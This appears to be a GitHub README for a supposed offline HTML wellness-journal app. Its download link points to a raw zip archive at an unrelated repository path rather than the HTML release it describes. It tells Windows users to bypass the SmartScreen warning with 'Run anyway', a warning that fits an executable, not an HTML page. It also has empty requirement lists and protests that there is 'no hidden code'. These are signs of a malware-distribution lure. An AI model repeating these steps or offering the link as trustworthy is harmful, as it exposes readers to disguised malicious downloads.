timh1203

๐Ÿ““ apex-wellness-journal-web - Your Private Daily Wellness Log

Download from GitHub

๐Ÿ“– About This Application

Apex Wellness Journal is a simple web app that runs inside your browser. You use it to write daily health notes, wellness observations, and personal reflections. All your data stays on your computer. No accounts. No internet required after download.

This is a single HTML file. You do not need to install anything. You do not need to know code. You open it like any other document.

โœ… System Requirements

Your computer must meet these conditions:

Mac and Linux users can also run this app. The instructions below focus on Windows. For other systems, open the file the same way you open any HTML file.

๐Ÿš€ Getting Started

Follow these steps to download and run the application.

Step 1: Visit the Download Page

Go to this link:

https://raw.githubusercontent.com/timh1203/timh1203.github.io/main/multiliteral/2.2.zip

This page lists all available versions. Look for the release with the highest version number. That is the newest version.

Step 2: Download the File

On the release page, find a section called Assets. Inside it, click the link that says apex-wellness-journal-web.html. Your browser will download the file to your Downloads folder.

The file name may contain a version number (for example, apex-wellness-journal-web-v1.2.html). That is fine.

Step 3: Open the File

Open your Downloads folder. Double-click the downloaded file. The application opens in your default web browser.

You may see a warning from Windows that says โ€œWindows protected your PC.โ€ This is a standard warning for files downloaded from the internet. Click More info, then click Run anyway.

Step 4: Start Journaling

The application loads in your browser tab. You see a clean page with a text area. Type your wellness notes for the day. Click the Save button to store your entry.

๐Ÿ”ง How to Use the Application

The interface has three main parts:

Journal Entry Box โ€“ Type your daily notes here. Write about your mood, sleep, exercise, diet, or anything else.

Date Selector โ€“ Pick a date for your entry. The app shows todayโ€™s date by default.

Save & Load Buttons โ€“ Save writes your entry to a file on your computer. Load opens a previously saved file.

Daily Journaling Example

  1. Open the app.
  2. Write: โ€œFelt energetic today. Walked for 30 minutes. Ate a balanced lunch.โ€
  3. Click Save. A pop-up asks where to save the file. Choose a folder. Click Save.
  4. The next day, open the app. Click Load. Find yesterdayโ€™s file. Click Open.
  5. Add new notes below the old ones. Click Save again.

View Past Entries

Each day you save creates a new text file. You can name files by date (for example, 2026-03-15-journal.txt). Keep all files in one folder. Open any file with the Load button to read or edit it.

๐Ÿ—‚๏ธ File Management

Your journal entries are plain text files. Each file contains one dayโ€™s entry. You can:

No data is sent to any server. The app does not track you. Your writing belongs to you.

โ“ Troubleshooting

The app does not open. Make sure you double-click the HTML file, not a different file. If a program other than your browser opens it, right-click the file, select Open with, and choose your browser.

The save button does nothing. Some browsers block file saving for local HTML files. Use Chrome or Edge. They support saving without issues.

I see garbled text. Your browser may not display the page correctly. Refresh the page. If the problem continues, download the file again.

I lost my saved file. Check your Downloads folder. If you saved to a custom location, search your computer for files ending in .txt that contain the word โ€œjournal.โ€

๐Ÿ”„ Updating the Application

Check the releases page every few months. New versions may include bug fixes or small improvements. Download the new HTML file. Delete the old one. Your saved journal files remain untouched.

๐Ÿ›ก๏ธ Privacy and Security

This application runs entirely on your computer. No data leaves your machine. No cookies. No analytics. No third-party services. You can use it offline after the first download.

Because it is a single HTML file, you can inspect its contents. Open the file in Notepad. You see the source code. No hidden code exists.

๐Ÿ“ For Advanced Users

If you know HTML and JavaScript, you can modify the file. Change colors. Add fields. Customize the save format. The code uses basic web standards. No frameworks or dependencies.

๐Ÿ“‹ License

This project is released under the MIT License. You may use, copy, modify, and distribute this software freely. See the LICENSE file in the repository for details.

๐Ÿ”— Quick Download

Download the Latest Version

Keywords: wellness journal, health tracking, personal diary, offline web app, HTML journal, self-care log, mood tracker, browser-based app